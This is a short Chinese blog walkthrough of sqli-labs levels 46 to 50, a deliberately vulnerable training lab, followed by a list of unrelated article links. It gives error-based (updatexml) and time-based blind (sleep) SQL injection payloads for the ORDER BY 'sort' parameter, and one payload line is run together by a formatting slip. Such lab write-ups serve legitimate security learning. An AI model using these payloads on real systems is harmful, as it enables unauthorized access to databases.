当前位置: 首页 > news >正文

sqli-labs靶场less46-less50

less46

1.打开靶场我们来看一下

2.传参的参数变成了SORT,我们来试一下,闭合为数字型

3.既然有报错信息,那我们就是要报错注入来做

sort=1 and updatexml(1,concat(1,database()),1)

4.剩下的步骤按报错注入继续往下做就行

less47

1.打开靶场来看一下

2.这一关和上一关看起来并无区别,拿之前方法判断一下,他的闭合方式变为了单引号,我们依旧可以构造报错注入,只是闭合方式变了

sort=1' and updatexml(1,concat(1,database()),3)--+

3.剩余内容按照报错注入往下做即可

less48

1.我们打开关卡看一下

2.这一关为字符型,不需要闭合,我们使用时间盲注来做,首先来爆一下数据库名字的长度

and if(length(database())>1,sleep(5),1)
and if(length(database())>8,sleep(5),1)

3.爆出来数据库名字长度后,剩余步骤按照报错注入接着往下做即可

less49

1.打开关卡之后看一下

2.这一关与上一关基本相同,只有闭合方式为单引号,爆数据库的数据库名字长度的语句如下

 1' and if(length(database())>1,sleep(5),1)1' and if(length(database())>8,sleep(5),1)

3.剩余的内容与上一关的同样使用报错注入即可

less50

1.打开这一关看一下,再使用之前的方法判断是数字型注入

2.这一关依旧可以使用时间盲注来做

?sort=1 and if(length(database())>1,sleep(5),1)
?sort=1 and if(length(database())>8,sleep(5),1)

3.剩余内容和前面几关一样

http://www.dtcms.com/a/321967.html

相关文章:

  • 传送带包裹漏检率↓78%!陌讯动态感知模型在物流分拣的实战优化
  • dMSA 滥用 (BadSuccessor) 导致权限升级:使用 ADAudit Plus 监控关键属性更改
  • Python使用LLM把自然语言翻译成SQL语句
  • 线程组和线程池的基本用法
  • 深入理解 SwiftUI 布局:VStack、HStack 和表单控件全解析
  • 电脑和手机访问网站,自动检测跳转不同网站
  • 将2小时的财报OCR识别录入缩短至5分钟,如何实现财报智能OCR录入
  • 创建一个Vue3项目
  • TLF35584芯片功能总结
  • Python基础语法练习
  • 力扣-56.合并区间
  • ESP32-menuconfig(4) -- Partition Table
  • [优选算法专题一双指针——三数之和]
  • Google再次颠覆自家模型,使用 MoR 模型打破 Transformer 模型壁垒
  • Java选手如何看待Golang
  • webapi项目添加访问IP限制
  • 根据字符出现频率排序
  • 【Bellman负环】Cycle Finding
  • (0️⃣基础)程序控制语句(初学者)(第3天)
  • 调用API接口返回参数缺失是什么原因导致的?
  • [3D数据存储] 对象 | OObject | IObject | 属性 | O<类型>Property | I<类型>Property
  • 安全基础DAY2-等级保护
  • linux-文件系统
  • AD8032ARZ-REEL7 ADI亚德诺 运算放大器 集成电路IC
  • 阿拉伯文识别技术:为连接古老智慧与数字未来铺设了关键道路
  • scratch笔记和练习-第11课:穿越峡谷
  • Cell-cultured meat: The new favorite on the future dining table
  • AR眼镜:能源行业设备维护的“安全守护者”
  • Shell脚本实现自动封禁恶意扫描IP
  • 考研复习-计算机组成原理-第四章-指令系统